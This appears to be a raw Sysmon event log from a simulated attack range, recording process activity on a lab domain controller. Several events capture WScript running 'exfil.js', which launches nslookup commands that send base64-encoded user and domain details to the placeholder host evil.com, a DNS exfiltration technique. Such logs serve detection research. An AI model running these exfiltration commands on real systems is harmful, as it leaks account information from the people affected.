14:16:44.694{2E1864BB-17CC-629A-E941-000000005F02}60847352C:\Windows\system32\conhost.exe{2E1864BB-17CC-629A-EA41-000000005F02}4572C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.694{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.694{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.694{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.694{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.694{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-EA41-000000005F02}4572C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.694{2E1864BB-17CC-629A-E841-000000005F02}74083596C:\Windows\system32\cmd.exe{2E1864BB-17CC-629A-EA41-000000005F02}4572C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.697{2E1864BB-17CC-629A-EA41-000000005F02}4572C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CC-629A-E841-000000005F02}7408C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyeio.tmp 2>&1 10341000x8000000000000000204030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.643{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CC-629A-E941-000000005F02}6084C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.643{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CC-629A-E941-000000005F02}6084C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.643{2E1864BB-17CC-629A-E941-000000005F02}60847352C:\Windows\system32\conhost.exe{2E1864BB-17CC-629A-E841-000000005F02}7408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.610{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-E941-000000005F02}6084C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.610{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.610{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.610{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.610{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.610{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-E841-000000005F02}7408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.610{2E1864BB-17A1-629A-783D-000000005F02}55526160C:\Windows\System32\WScript.exe{2E1864BB-17CC-629A-E841-000000005F02}7408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.609{2E1864BB-17CC-629A-E841-000000005F02}7408C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyeio.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.594{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlknrs.tmpMD5=9C101754059B3D04F26CF3E2F51B88AA,SHA256=CC24D14F511AA03DA88D98786AE6BD9247656E6D05B1882F17E6E6D57E27DA80,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.540{2E1864BB-17CC-629A-E641-000000005F02}73006432C:\Windows\system32\conhost.exe{2E1864BB-17CC-629A-E741-000000005F02}7224C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.525{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.525{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.525{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.525{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.525{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-E741-000000005F02}7224C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.525{2E1864BB-17CC-629A-E541-000000005F02}72723796C:\Windows\system32\cmd.exe{2E1864BB-17CC-629A-E741-000000005F02}7224C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.534{2E1864BB-17CC-629A-E741-000000005F02}7224C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CC-629A-E541-000000005F02}7272C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlknrs.tmp 2>&1 10341000x8000000000000000204010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.509{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CC-629A-E641-000000005F02}7300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.509{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CC-629A-E641-000000005F02}7300C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.493{2E1864BB-17CC-629A-E641-000000005F02}73006432C:\Windows\system32\conhost.exe{2E1864BB-17CC-629A-E541-000000005F02}7272C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.493{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-E641-000000005F02}7300C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 